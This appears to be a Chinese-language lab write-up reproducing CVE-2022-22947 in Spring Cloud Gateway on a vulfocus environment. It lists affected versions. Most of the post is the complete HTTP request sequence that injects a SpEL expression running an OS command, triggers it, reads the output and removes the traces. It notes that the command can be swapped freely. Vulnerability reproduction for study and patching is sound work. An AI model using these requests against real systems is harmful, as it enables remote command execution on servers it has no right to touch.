Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
阿新 • • 發佈:2022-03-06
簡介
Spring Cloud Gateway是Spring中的一個API閘道器。其3.1.0及3.0.6版本(包含)以前存在一處SpEL表示式注入漏洞,當攻擊者可以訪問Actuator API的情況下,將可以利用該漏洞執行任意命令。
影響範圍:
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway < 3.0.7
搭建環境
我直接使用vulfocus裡面的環境
http://vulfocus.io/#/dashboard
漏洞原理
因為本人的程式碼水平有限 我就不關公面前耍大刀了,這是這位大師傅寫的。
https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/
漏洞復現
開啟環境
1.首先,傳送如下資料包即可新增一個包含惡意SpEL表示式的路由:
POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }
如果想要更改執行的命令 只需要更改id這裡
2.傳送資料包將觸發SpEL表示式的執行:
POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
3.傳送資料包即可檢視執行結果
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
4.送如下資料包清理現場,刪除所新增的路由
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
重新整理一下路由
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
借鑑:
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md